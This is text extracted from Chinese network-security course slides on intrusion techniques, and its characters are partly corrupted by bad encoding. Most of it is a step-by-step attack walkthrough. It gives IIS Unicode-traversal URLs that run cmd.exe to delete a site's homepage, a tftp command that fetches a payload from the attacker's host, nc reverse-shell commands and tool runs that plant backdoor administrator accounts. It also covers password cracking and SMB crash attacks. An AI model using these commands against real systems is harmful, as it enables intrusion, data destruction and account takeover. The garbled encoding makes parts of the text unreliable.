計算機網(wǎng)絡(luò)安全.ppt

第五章網(wǎng)絡(luò)入侵 5 內(nèi)容提要 本章是攻擊技術(shù)中最重要的一章 介紹目前常用的網(wǎng)絡(luò)攻擊手段 社會工程學攻擊物理攻擊暴力攻擊利用Unicode漏洞攻擊利用緩沖區(qū)溢出漏洞進行攻擊等技術(shù) 并結(jié)合實際 介紹流行的攻擊工具的使用以及部分工具的代碼實現(xiàn) 社會工程學攻擊 社交工程是使用計謀和假情報去獲得密碼和其他敏感信息的科學 研究一個站點的策略其中之一就是盡可能多的了解這個組織的個體 因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息 舉個例子 一組高中學生曾經(jīng)想要進入一個當?shù)氐墓镜挠嬎銠C網(wǎng)絡(luò) 他們擬定了一個表格 調(diào)查看上去顯得是無害的個人信息 例如所有秘書和行政人員和他們的配偶 孩子的名字 這些從學生轉(zhuǎn)變成的黑客說這種簡單的調(diào)查是他們社會研究工作的一部分 利用這份表格這些學生能夠快速的進入系統(tǒng) 因為網(wǎng)絡(luò)上的大多數(shù)人是使用寵物和他們配偶名字作為密碼 社會工程學攻擊 目前社會工程學攻擊主要包括兩種方式 打電話請求密碼和偽造Email1 打電話請求密碼盡管不像前面討論的策略那樣聰明 打電話尋問密碼也經(jīng)常奏效 在社會工程中那些黑客冒充失去密碼的合法雇員 經(jīng)常通過這種簡單的方法重新獲得密碼 2 偽造Email使用telnet一個黑客可以截取任何一個身份證發(fā)送Email的全部信息 這樣的Email消息是真的 因為它發(fā)自于一個合法的用戶 在這種情形下這些信息顯得是絕對的真實 黑客可以偽造這些 一個冒充系統(tǒng)管理員或經(jīng)理的黑客就能較為輕松的獲得大量的信息 黑客就能實施他們的惡意陰謀 物理攻擊與防范 物理安全是保護一些比較重要的設(shè)備不被接觸 物理安全比較難防 因為攻擊往往來自能夠接觸到物理設(shè)備的用戶 案例5 1得到管理員密碼 用戶登錄以后 所有的用戶信息都存儲在系統(tǒng)的一個進程中 這個進程是 winlogon exe 可以利用程序?qū)斍暗卿浻脩舻拿艽a解碼出來 如圖5 1所示 案例5 1得到管理員密碼 使用FindPass等工具可以對該進程進行解碼 然后將當前用戶的密碼顯示出來 將FindPass exe拷貝到C盤根目錄 執(zhí)行該程序 將得到當前用戶得登錄名 如圖5 2所示 權(quán)限提升 有時候 管理員為了安全 給其他用戶建立一個普通用戶帳號 認為這樣就安全了 其實不然 用普通用戶帳號登錄后 可以利用工具GetAdmin exe將自己加到管理員組或者新建一個具有管理員權(quán)限的用戶 案例5 2普通用戶建立管理員帳號 利用Hacker帳戶登錄系統(tǒng) 在系統(tǒng)中執(zhí)行程序GetAdmin exe 程序自動讀取所有用戶列表 在對話框中點擊按鈕 New 在框中輸入要新建的管理員組的用戶名 如圖5 5所示 普通用戶建立管理員帳號 輸入一個用戶名 IAMHacker 點擊按鈕 確定 以后 然后點擊主窗口的按鈕 OK 出現(xiàn)添加成功的窗口 如圖5 6所示 暴力攻擊 暴力攻擊的一個具體例子是 一個黑客試圖使用計算機和信息去破解一個密碼 一個黑客需要破解 段單一的被用非對稱密鑰加密的信息 為了破解這種算法 一個黑客需要求助于非常精密復雜的方法 它使用120個工作站 兩個超級計算機利用從三個主要的研究中心獲得的信息 即使擁有這種配備 它也將花掉八天的時間去破解加密算法 實際上破解加密過程八天已是非常短暫的時間了 字典文件 一次字典攻擊能否成功 很大因素上決定與字典文件 一個好的字典文件可以高效快速的得到系統(tǒng)的密碼 攻擊不同的公司 不通地域的計算機 可以根據(jù)公司管理員的姓氏以及家人的生日 可以作為字典文件的一部分 公司以及部門的簡稱一般也可以作為字典文件的一部分 這樣可以大大的提高破解效率 一個字典文件本身就是一個標準的文本文件 其中的每一行就代表一個可能的密碼 目前有很多工具軟件專門來創(chuàng)建字典文件 圖5 8是一個簡單的字典文件 暴力破解操作系統(tǒng)密碼 字典文件為暴力破解提供了一條捷徑 程序首先通過掃描得到系統(tǒng)的用戶 然后利用字典中每一個密碼來登錄系統(tǒng) 看是否成功 如果成功則將密碼顯示案例5 3暴力破解操作系統(tǒng)密碼比如使用圖5 8所示的字典文件 利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來 如圖5 9所示 暴力破解郵箱密碼 郵箱的密碼一般需要設(shè)置到八位以上 否則七位以下的密碼容易被破解 尤其七位全部是數(shù)字 更容易被破解 案例5 4電子郵箱暴力破解破解電子郵箱密碼 一個比較著名的工具軟件是 黑雨 POP3郵箱密碼暴力破解器 比較穩(wěn)定的版本是2 3 1 主界面如圖5 10所示 暴力破解軟件密碼 目前許多軟件都具有加密的功能 比如Office文檔 Winzip文檔和Winrar文檔等等 這些文檔密碼可以有效的防止文檔被他人使用和閱讀 但是如果密碼位數(shù)不夠長的話 同樣容易被破解 案例5 5Office文檔暴力破解 修改權(quán)限密碼 在對話框中選擇選項卡 安全性 在打開權(quán)限密碼和修改權(quán)限密碼的兩個文本框中都輸入 999 如圖5 12所示 輸入密碼 保存并關(guān)閉該文檔 然后再打開 就需要輸入密碼了 如圖5 13所示 破解Word文檔密碼 該密碼是三位的 使用工具軟件 AdvancedOfficeXPPasswordRecovery可以快速破解Word文檔密碼 主界面如圖5 14所示 破解Word文檔密碼 點擊工具欄按鈕 OpenFile 打開剛才建立的Word文檔 程序打開成功后會在LogWindow中顯示成功打開的消息 如圖5 15所示 破解Word文檔密碼 設(shè)置密碼長度最短是一位 最長是三位 點擊工具欄開始的圖標 開始破解密碼 大約兩秒鐘后 密碼被破解了 如圖5 16所示 Unicode漏洞專題 通過打操作系統(tǒng)的補丁程序 就可以消除漏洞 只要是針對漏洞進行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補丁 Unicode漏洞是2000 10 17發(fā)布的 受影響的版本 MicrosoftIIS5 0 MicrosoftWindows2000系列版本MicrosoftIIS4 0 MicrosoftWindowsNT4 0消除該漏洞的方式是安裝操作系統(tǒng)的補丁 只要安裝了SP1以后 該漏洞就不存在了 微軟IIS4 0和5 0都存在利用擴展UNICODE字符取代 和 而能利用 目錄遍歷的漏洞 Unicode漏洞的檢測方法 使用掃描工具來檢測Unicode漏洞是否存在 使用上一章介紹的X Scan來對目標系統(tǒng)進行掃描 目標主機IP為 172 18 25 109 Unicode漏洞屬于IIS漏洞 所以這里只掃描IIS漏洞就可以了 X Scan設(shè)置如圖5 17所示 Unicode漏洞的檢測方法 將主機添加到目標地址 掃描結(jié)果如圖5 18所示 Unicode漏洞的檢測方法 可以看出 存在許多系統(tǒng)的漏洞 只要是 scripts開頭的漏洞都是Unicode漏洞 比如 scripts c0 2f winnt system32 cmd exe c dir其中 scripts目錄是IIS提供的可以執(zhí)行命令的一個有執(zhí)行程序權(quán)限的一個目錄 在IIS中的位置如圖5 19所示 Unicode漏洞的檢測方法 scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下 如圖5 20所示 Unicode漏洞的檢測方法 在Windows的目錄結(jié)構(gòu)中 可以使用兩個點和一個斜線 來訪問上一級目錄 在瀏覽器中利用 scripts 可以訪問到系統(tǒng)盤根目錄 訪問 scripts winnt system32 就訪問到系統(tǒng)的系統(tǒng)目錄了 在system32目錄下包含許多重要的系統(tǒng)文件 比如cmd exe文件 可以利用該文件新建用戶 刪除文件等操作 瀏覽器地址欄中禁用符號 但是可以使用符號 的Unicode的編碼 比如 scripts c0 2f winnt system32 cmd exe c dir 中的 c0 2f 就是 的Unicode編碼 這條語句是執(zhí)行dir命令列出目錄結(jié)構(gòu) Unicode漏洞 此漏洞從中文IIS4 0 SP6開始 還影響中文WIN2000 IIS5 0 中文WIN2000 IIS5 0 SP1 臺灣繁體中文也同樣存在這樣的漏洞 在NT4中 編碼為 c1 9c 或者 c1 9c WIN2000英文版是 c0 af 但從國外某些站點得來的資料顯示 還有以下的編碼可以實現(xiàn)對該漏洞的檢測 該編碼存在于日文版 韓文版等操作系統(tǒng) c1 pc c0 9v c0 qf c1 8s e0 80 af利用該漏洞讀取出計算機上目錄列表 比如讀取C盤的目錄 只要在瀏覽器中輸入 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c dir c 利用Unicode漏洞讀取系統(tǒng)盤目錄 利用Unicode漏洞讀取系統(tǒng)盤目錄 利用語句得到對方計算機上裝了幾個操作系統(tǒng)以及操作系統(tǒng)的類型 只要讀取C盤下的boot ini文件就可以了 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c type c boot ini執(zhí)行的結(jié)果如圖5 22所示 利用Unicode漏洞刪除主頁 利用Unicode可以方便的更改對方的主頁 比如現(xiàn)在已經(jīng)知道對方網(wǎng)站的根路徑在 C Initpub wwwroot 系統(tǒng)默認 下 可以刪除該路徑下的文件 default asp 來刪除主頁 這里的 default asp 文件是IIS的默認啟動頁面 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c del c inetpub wwwroot default asp 利用Unicode漏洞刪除主頁 拷貝文件 為了是使用方便 利用語句將cmd exe文件拷貝到scripts目錄 并改名為c exe 使用的語句是 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c copy C winnt system32 cmd exe c exe程序執(zhí)行結(jié)果如圖5 24所示 查看C盤的目錄 以后使用cmd exe命令就方便了 比如查看C盤的目錄 使用的語句就可以簡化為 http 172 18 25 109 scripts c exe c dir c 執(zhí)行的結(jié)果如圖5 25所示 利用Unicode漏洞入侵系統(tǒng) 在地址欄上執(zhí)行命令 用戶的權(quán)限比較低 像net等系統(tǒng)管理指令不能執(zhí)行 利用Unicode可以入侵對方的系統(tǒng) 并得到管理員權(quán)限 首先需要向?qū)Ψ椒掌魃蟼饕恍┪募?入侵的第一步 建立tftp服務器 向?qū)Ψ降膕cripts文件夾傳幾個文件 需要上傳一個名為 idq dll 的文件 為了上傳這個文件 首先在本地計算機上搭建一個TFTP服務器 普通文件傳輸協(xié)議TFTP TextFileTransmissionProtocol 一般用來傳輸單個文件 使用工具軟件tftpd32 exe建立服務器 將idq dll和tftpd32 exe放在本地的同一目錄下 執(zhí)行tftpd32 exe程序 主界面如圖5 26所示 利用Unicode漏洞入侵系統(tǒng) 利用Unicode漏洞入侵系統(tǒng) 這樣在本地的TFTP的服務器就建立好了 保留這個窗口 通過該服務器向?qū)Ψ絺鬟fidq dll文件 在瀏覽器中執(zhí)行命令 http 172 18 25 109 scripts c0 2f winnt system32 cmd exe c tftp i 172 18 25 110 get idq dll 命令其實是 tftp i172 18 25 110getidq dll 意思是從172 18 25 110服務器上獲取idq dll文件 執(zhí)行成功的界面如圖5 27所示 上載文件 查看scripts目錄 上傳完畢后可以查看一下scripts目錄 是否真的上傳成功了 如圖5 28所示 入侵對方主機 說明已經(jīng)成功的在scripts目錄中上傳了一個idq dll文件 下面使用工具軟件ispc exe入侵對方系統(tǒng) 拷貝ispc exe文件到本地計算機的C盤根目錄 在DOS命令行下執(zhí)行命令 ispc exe172 18 25 109 scripts idq dll 連接成功后就直接進入了對方的DOS命令行下 而且具有管理員權(quán)限 入侵的過程5 29所示 建立用戶 可以在對方計算機上做管理員可以做的一切事情 比如添加用戶 建立一個用戶名為 Hacker123 密碼也是 Hacker123 的用戶 如圖5 30所示 其他漏洞攻擊 利用打印漏洞利用打印漏洞可以在目標的計算機上添加一個具有管理員權(quán)限的用戶 經(jīng)過測試 該漏洞在SP2 SP3以及SP4版本上依然存在 但是不能保證100 入侵成功 使用工具軟件 cniis exe 使用的語法格式是 cniis172 18 25 1090 第一個參數(shù)是目標的IP地址 第二參數(shù)是目標操作系統(tǒng)的補丁號 因為172 18 25 109沒有打補丁 這里就是0 拷貝cniis exe文件到C盤根目錄 執(zhí)行程序如圖5 31所示 SMB致命攻擊 SMB SessionMessageBlock 會話消息塊協(xié)議 又叫做NetBIOS或LanManager協(xié)議 用于不同計算機之間文件 打印機 串口和通訊的共享和用于Windows平臺上提供磁盤和打印機的共享 SMB協(xié)議版本有很多種 在Windows98 WindowsNT Windows2000和XP使用的是NTLM0 12版本 利用該協(xié)議可以進行各方面的攻擊 比如可以抓取其他用戶訪問自己計算機共享目錄的SMB會話包 然后利用SMB會話包登錄對方的計算機 下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動或者藍屏 致命攻擊 使用的工具軟件是 SMBDieV1 0 該軟件對打了SP3 SP4的計算機依然有效 必須打?qū)ｉT的SMB補丁 軟件的主界面如圖5 32所示 致命攻擊 攻擊的時候 需要兩個參數(shù) 對方的IP地址和對方的機器名 窗口中分別輸入這兩項 如圖5 33所示 致命攻擊 然后再點按鈕 Kill 如果參數(shù)輸入沒有錯誤的話 對方計算機立刻重啟或藍屏 命中率幾乎100 被攻擊的計算機藍屏界面如圖5 34所示 緩沖區(qū)溢出攻擊 目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊 當目標操作系統(tǒng)收到了超過了它的最大能接收的信息量的時候 將發(fā)生緩沖區(qū)溢出 這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出 然后覆蓋了實際的程序數(shù)據(jù) 緩沖區(qū)溢出使目標系統(tǒng)的程序被修改 經(jīng)過這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個后門 這項攻擊對技術(shù)要求比較高 但是攻擊的過程卻非常簡單 緩沖區(qū)溢出原理很簡單 比如程序 緩沖區(qū)溢出攻擊 voidfunction char szPara1 charbuff 16 strcpy buffer szPara1 程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中 只要szPara1的長度大于16 就會造成緩沖區(qū)溢出 存在strcpy函數(shù)這樣問題的C語言函數(shù)還有 strcat gets scanf 等 RPC漏洞溢出 遠程過程調(diào)用RPC RemoteProcedureCall 是操作系統(tǒng)的一種消息傳遞功能 允許應用程序呼叫網(wǎng)絡(luò)上的計算機 當系統(tǒng)啟動的時候 自動加載RPC服務 可以在服務列表中看到系統(tǒng)的RPC服務 如圖5 35所示 利用RPC漏洞建立超級用戶 RPC溢出漏洞 對SP4也適用 必須打?qū)Ｓ醚a丁 利用工具scanms exe文件檢測RPC漏洞 該工具是ISS安全公司2003年7月30日發(fā)布的 運行在命令行下用來檢測指定IP地址范圍內(nèi)機器是否已經(jīng)安裝了 DCOMRPC接口遠程緩沖區(qū)溢出漏洞 823980 MS03 026 補丁程序 如果沒有安裝補丁程序 該IP地址就會顯示出 VULN 首先拷貝該文件到C盤根目錄 現(xiàn)在要檢查地址段172 18 25 109到172 18 25 110的主機 執(zhí)行命令 scanms exe172 18 25 109 172 18 25 110 檢查過程如圖5 36所示 檢查緩沖區(qū)溢出漏洞 檢查緩沖區(qū)溢出漏洞 利用工具軟件attack exe對172 18 25 109進行攻擊 攻擊的結(jié)果將在對方計算機上建立一個具有管理員權(quán)限的用戶 并終止了對方的RPC服務 新建用戶的用戶名和密碼都是qing10 這樣就可以登錄對方計算機了 RPC服務停止操作系統(tǒng)將有許多功能不能使用 非常容易被管理員發(fā)現(xiàn) 使用工具軟件OpenRpcSs exe來給對方重啟RPC服務 攻擊的全過程如圖5 37所示 攻擊的全過程 利用IIS溢出進行攻擊 案例5 11利用IIS溢出入侵系統(tǒng)利用軟件SnakeIIS溢出工具可以讓對方的IIS溢出 還可以捆綁執(zhí)行的命令和在對方計算機上開辟端口 工具軟件的主界面如圖5 38所示 利用IIS溢出進行攻擊 該軟件適用于各種類型的操作系統(tǒng) 比如對172 18 25 109進行攻擊 172 18 25 109的操作系統(tǒng)的Windows2000 沒有安裝補丁程序 攻擊完畢后 開辟一個813端口 并在對方計算機上執(zhí)行命令 dirc 設(shè)置如圖5 39所示 點擊按鈕 IDQ溢出 出現(xiàn)攻擊成功的提示框 如圖5 40所示 這個時候 813端口已經(jīng)開放 利用工具軟件nc exe連接到該端口 將會自動執(zhí)行改才發(fā)送的DOS命令 dirc 使用的語法是 nc exe vv172 18 25 109813 其中 vv是程序的參數(shù) 813是目標端口 可以看到命令的執(zhí)行結(jié)果 如圖5 41所示 監(jiān)聽本地端口 下面利用nc exe和snake工具的另外一種組合入侵對方計算機 首先利用nc exe命令監(jiān)聽本地的813端口 使用的基本語法是 nc l p813 執(zhí)行的過程如圖5 42所示 這個窗口就這樣一直保留 啟動工具軟件snake 本地的IP地址是172 18 25 110 要攻擊的計算機的IP地址是172 18 25 109 選擇溢出選項中的第一項 設(shè)置IP為本地IP地址 端口是813 如圖5 43所示 設(shè)置好以后 點擊按鈕 IDQ溢出 程序顯示對話框如圖4 44所示 查看nc命令的DOS框 在該界面下 已經(jīng)執(zhí)行了設(shè)置的DOS命令 將對方計算機的C盤根目錄列出來 如圖4 45所示 利用WebDav遠程溢出 需要使用工具軟件nc exe和webdavx3 exe 首先在DOS命令行下執(zhí)行webdavx3 exe 如果執(zhí)行的話 該程序?qū)⑻崾疽呀?jīng)過期了 如圖4 46所示 攻擊 修改本地系統(tǒng)時間到2001年 這樣就可以攻擊了 在命令后面直接跟對方的IP地址就可以了 現(xiàn)在要攻擊的計算機是172 18 25 109 執(zhí)行情況如圖4 47所示 入侵對方的計算機 該程序不能自動退出 當發(fā)現(xiàn)程序長時間沒有反映的時候 需要手工按下 CTRL C 退出程序 該程序在對方的計算機上開了一個端口7788 依然可以nc exe程序入侵對方的計算機 過程如圖4 48所示 拒絕服務攻擊 拒絕服務攻擊的簡稱是 DoS DenialofService 攻擊 凡是造成目標計算機拒絕提供服務的攻擊都稱為DoS攻擊 其目的是使目標計算機或網(wǎng)絡(luò)無法提供正常的服務 最常見的DoS攻擊是 計算機網(wǎng)絡(luò)帶寬攻擊和連通性攻擊 帶寬攻擊是以極大的通信量沖擊網(wǎng)絡(luò) 使網(wǎng)絡(luò)所有可用的帶寬都被消耗掉 最后導致合法用戶的請求無法通過 連通性攻擊指用大量的連接請求沖擊計算機 最終導致計算機無法再處理合法用戶的請求 案例5 13程序分析 案例5 13程序分析利用緩